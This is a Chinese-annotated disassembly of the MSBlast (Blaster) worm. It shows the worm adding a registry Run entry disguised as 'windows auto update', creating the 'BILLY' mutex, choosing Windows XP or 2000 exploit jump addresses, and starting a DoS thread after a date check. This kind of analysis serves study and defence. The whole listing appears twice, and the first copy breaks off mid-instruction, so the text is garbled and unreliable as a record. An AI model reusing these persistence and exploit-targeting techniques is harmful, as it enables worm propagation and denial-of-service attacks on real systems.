tombkeeper#whitecell.org
;在注册表中写入自启动项
:00401250 55 push ebp
:00401251 89E5 mov ebp, esp
:00401253 81ECAC030000 sub esp, 000003AC
:00401259 56 push esi
:0040125A 57 push edi
:0040125B 31F6 xor esi, esi
:0040125D 6A00 push 00000000
:0040125F 8D45F8 lea eax, dword ptr [ebp-08]
:00401262 50 push eax
:00401263 6A00 push 00000000
:00401265 683F000F00 push 000F003F
:0040126A 6A00 push 00000000
:0040126C 6A00 push 00000000
:0040126E 6A00 push 00000000
:00401270 685D484000 push 0040485D ;db 'SOFTWARE/Microsoft/Windows/CurrentVersion/Run',0
:00401275 6802000080 push 80000002
:0040127A E80D110000 Call 0040238C ;ADVAPI32.RegCreateKeyExA
:0040127F 6A32 push 00000032
:00401281 683C404000 push 0040403C ;db 'msblast.exe',0
:00401286 6A01 push 00000001
:00401288 6A00 push 00000000
:0040128A 6849484000 push 00404849 ;db 'windows auto update',0
:0040128F FF75F8 push [ebp-08]
:00401292 E801110000 Call 00402398 ;ADVAPI32.RegSetValueExA
:00401297 FF75F8 push [ebp-08]
:0040129A E8E1100000 Call 00402380 ;ADVAPI32.RegCloseKey
;创建互斥体
:0040129F 6843484000 push 00404843 ;db 'BILLY',0
:004012A4 6A01 push 00000001
:004012A6 6A00 push 00000000
:004012A8 E8A3100000 Call 00402350 ;KERNEL32.CreateMutexA
……………………
;选择发送数据的随机数
:00401476 E8BD0E0000 Call 00402338 ;KERNEL32.GetTickCount
:0040147B 50 push eax ;用GetTickCount的输出作为srand的随机数种子
:0040147C E8B30F0000 Call 00402434 ;CRTDLL.srand
:00401481 59 pop ecx
:00401482 E8890F0000 Call 00402410 ;CRTDLL.rand
:00401487 B914000000 mov ecx, 00000014
:0040148C 99 cdq
:0040148D F7F9 idiv ecx ;
:0040148F 83FA0C cmp edx, 0000000C
:00401492 7D02 jge 00401496
:00401494 31F6 xor esi, esi
:00401496 C7053431400001000000 mov dword ptr [00403134], 00000001
:004014A0 E86B0F0000 Call 00402410 ;CRTDLL.rand
:004014A5 B90A000000 mov ecx, 0000000A
:004014AA 99 cdq
:004014AB F7F9 idiv ecx
:004014AD 83FA07 cmp edx, 00000007
:004014B0 7E0A jle 004014BC
:004014B2 C7053431400002000000 mov dword ptr [00403134], 00000002
……………………
:00401954 833D3431400001 cmp dword ptr [00403134], 00000001 ;通过比较这个地址来确定发送针对2000还是XP的攻击代码
:0040195B 750C jne 00401969
:0040195D C785ECEAFFFF9D130001 mov dword ptr [ebp+FFFFEAEC], 0100139D ;使用针对Windows XP的跳转地址
:00401967 EB0A jmp 00401973
:00401969 C785ECEAFFFF9F751800 mov dword ptr [ebp+FFFFEAEC], 0018759F ;使用针对Windows 2000的跳转地址
……………………
;判断日期
:004014FC 6A03 push 00000003 ;size of buffer
:004014FE 8D45F4 lea eax, dword ptr [ebp-0C]
:00401501 50 push eax ;buffer
:00401502 683C484000 push 0040483C ;db 'd',0 取日期
:00401507 6A00 push 00000000
:00401509 6A00 push 00000000
:0040150B 6809040000 push 00000409 ;"0409"="en-us;英语 (美国)"
;从GetDateFormatA的Locale参数来看,作者使用的操作系统的区域设置是美国。
:00401510 E8E70D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:00401515 6A03 push 00000003
:00401517 8D45F0 lea eax, dword ptr [ebp-10]
:0040151A 50 push eax
:0040151B 683A484000 push 0040483A ;db 'M',0 取月份
:00401520 6A00 push 00000000
:00401522 6A00 push 00000000
:00401524 6809040000 push 00000409
:00401529 E8CE0D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:0040152E 8D45F4 lea eax, dword ptr [ebp-0C]
:00401531 50 push eax
:00401532 E8790E0000 Call 004023B0 ;CRTDLL.atoi
:00401537 59 pop ecx
:00401538 83F80F cmp eax, 0000000F ;比较日期是否大于15日
:0040153B 7F0F jg 0040154C ;日期大于15日则跳到创建DoS线程
:0040153D 8D7DF0 lea edi, dword ptr [ebp-10]
:00401540 57 push edi
:00401541 E86A0E0000 Call 004023B0 ;CRTDLL.atoi
:00401546 59 pop ecx
:00401547 83F808 cmp eax, 00000008 ;比较月份是否大于8月
:0040154A 7E16 jle 00401562 ;月份大于8月则往下执行创建DoS线程
:0040154C 8D45FC lea eax, dword ptr [ebp-04]
:0040154F 50 push eax
:00401550 6A00 push 00000000
:00401552 6A00 push 00000000
:00401554 68C11E4000 push 00401EC1 ;DoS子函数
:00401559 6A00 push 00000000
:0040155B 6A00 push 00000000
:0040155D E8120E0000 Call 00402374 ;KERNEL32.CreateThread
……………………
;处理地址子函数,转换结果保存在eax
:00401E8B 55 push ebp
:00401E8C 89E5 mov ebp, esp
:00401E8E 56 push esi
:00401E8F 5
;在注册表中写入自启动项
:00401250 55 push ebp
:00401251 89E5 mov ebp, esp
:00401253 81ECAC030000 sub esp, 000003AC
:00401259 56 push esi
:0040125A 57 push edi
:0040125B 31F6 xor esi, esi
:0040125D 6A00 push 00000000
:0040125F 8D45F8 lea eax, dword ptr [ebp-08]
:00401262 50 push eax
:00401263 6A00 push 00000000
:00401265 683F000F00 push 000F003F
:0040126A 6A00 push 00000000
:0040126C 6A00 push 00000000
:0040126E 6A00 push 00000000
:00401270 685D484000 push 0040485D ;db 'SOFTWARE/Microsoft/Windows/CurrentVersion/Run',0
:00401275 6802000080 push 80000002
:0040127A E80D110000 Call 0040238C ;ADVAPI32.RegCreateKeyExA
:0040127F 6A32 push 00000032
:00401281 683C404000 push 0040403C ;db 'msblast.exe',0
:00401286 6A01 push 00000001
:00401288 6A00 push 00000000
:0040128A 6849484000 push 00404849 ;db 'windows auto update',0
:0040128F FF75F8 push [ebp-08]
:00401292 E801110000 Call 00402398 ;ADVAPI32.RegSetValueExA
:00401297 FF75F8 push [ebp-08]
:0040129A E8E1100000 Call 00402380 ;ADVAPI32.RegCloseKey
;创建互斥体
:0040129F 6843484000 push 00404843 ;db 'BILLY',0
:004012A4 6A01 push 00000001
:004012A6 6A00 push 00000000
:004012A8 E8A3100000 Call 00402350 ;KERNEL32.CreateMutexA
……………………
;选择发送数据的随机数
:00401476 E8BD0E0000 Call 00402338 ;KERNEL32.GetTickCount
:0040147B 50 push eax ;用GetTickCount的输出作为srand的随机数种子
:0040147C E8B30F0000 Call 00402434 ;CRTDLL.srand
:00401481 59 pop ecx
:00401482 E8890F0000 Call 00402410 ;CRTDLL.rand
:00401487 B914000000 mov ecx, 00000014
:0040148C 99 cdq
:0040148D F7F9 idiv ecx ;
:0040148F 83FA0C cmp edx, 0000000C
:00401492 7D02 jge 00401496
:00401494 31F6 xor esi, esi
:00401496 C7053431400001000000 mov dword ptr [00403134], 00000001
:004014A0 E86B0F0000 Call 00402410 ;CRTDLL.rand
:004014A5 B90A000000 mov ecx, 0000000A
:004014AA 99 cdq
:004014AB F7F9 idiv ecx
:004014AD 83FA07 cmp edx, 00000007
:004014B0 7E0A jle 004014BC
:004014B2 C7053431400002000000 mov dword ptr [00403134], 00000002
……………………
:00401954 833D3431400001 cmp dword ptr [00403134], 00000001 ;通过比较这个地址来确定发送针对2000还是XP的攻击代码
:0040195B 750C jne 00401969
:0040195D C785ECEAFFFF9D130001 mov dword ptr [ebp+FFFFEAEC], 0100139D ;使用针对Windows XP的跳转地址
:00401967 EB0A jmp 00401973
:00401969 C785ECEAFFFF9F751800 mov dword ptr [ebp+FFFFEAEC], 0018759F ;使用针对Windows 2000的跳转地址
……………………
;判断日期
:004014FC 6A03 push 00000003 ;size of buffer
:004014FE 8D45F4 lea eax, dword ptr [ebp-0C]
:00401501 50 push eax ;buffer
:00401502 683C484000 push 0040483C ;db 'd',0 取日期
:00401507 6A00 push 00000000
:00401509 6A00 push 00000000
:0040150B 6809040000 push 00000409 ;"0409"="en-us;英语 (美国)"
;从GetDateFormatA的Locale参数来看,作者使用的操作系统的区域设置是美国。
:00401510 E8E70D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:00401515 6A03 push 00000003
:00401517 8D45F0 lea eax, dword ptr [ebp-10]
:0040151A 50 push eax
:0040151B 683A484000 push 0040483A ;db 'M',0 取月份
:00401520 6A00 push 00000000
:00401522 6A00 push 00000000
:00401524 6809040000 push 00000409
:00401529 E8CE0D0000 Call 004022FC ;KERNEL32.GetDateFormatA
:0040152E 8D45F4 lea eax, dword ptr [ebp-0C]
:00401531 50 push eax
:00401532 E8790E0000 Call 004023B0 ;CRTDLL.atoi
:00401537 59 pop ecx
:00401538 83F80F cmp eax, 0000000F ;比较日期是否大于15日
:0040153B 7F0F jg 0040154C ;日期大于15日则跳到创建DoS线程
:0040153D 8D7DF0 lea edi, dword ptr [ebp-10]
:00401540 57 push edi
:00401541 E86A0E0000 Call 004023B0 ;CRTDLL.atoi
:00401546 59 pop ecx
:00401547 83F808 cmp eax, 00000008 ;比较月份是否大于8月
:0040154A 7E16 jle 00401562 ;月份大于8月则往下执行创建DoS线程
:0040154C 8D45FC lea eax, dword ptr [ebp-04]
:0040154F 50 push eax
:00401550 6A00 push 00000000
:00401552 6A00 push 00000000
:00401554 68C11E4000 push 00401EC1 ;DoS子函数
:00401559 6A00 push 00000000
:0040155B 6A00 push 00000000
:0040155D E8120E0000 Call 00402374 ;KERNEL32.CreateThread
……………………
;处理地址子函数,转换结果保存在eax
:00401E8B 55 push ebp
:00401E8C 89E5 mov ebp, esp
:00401E8E 56 push esi
:00401E8F 5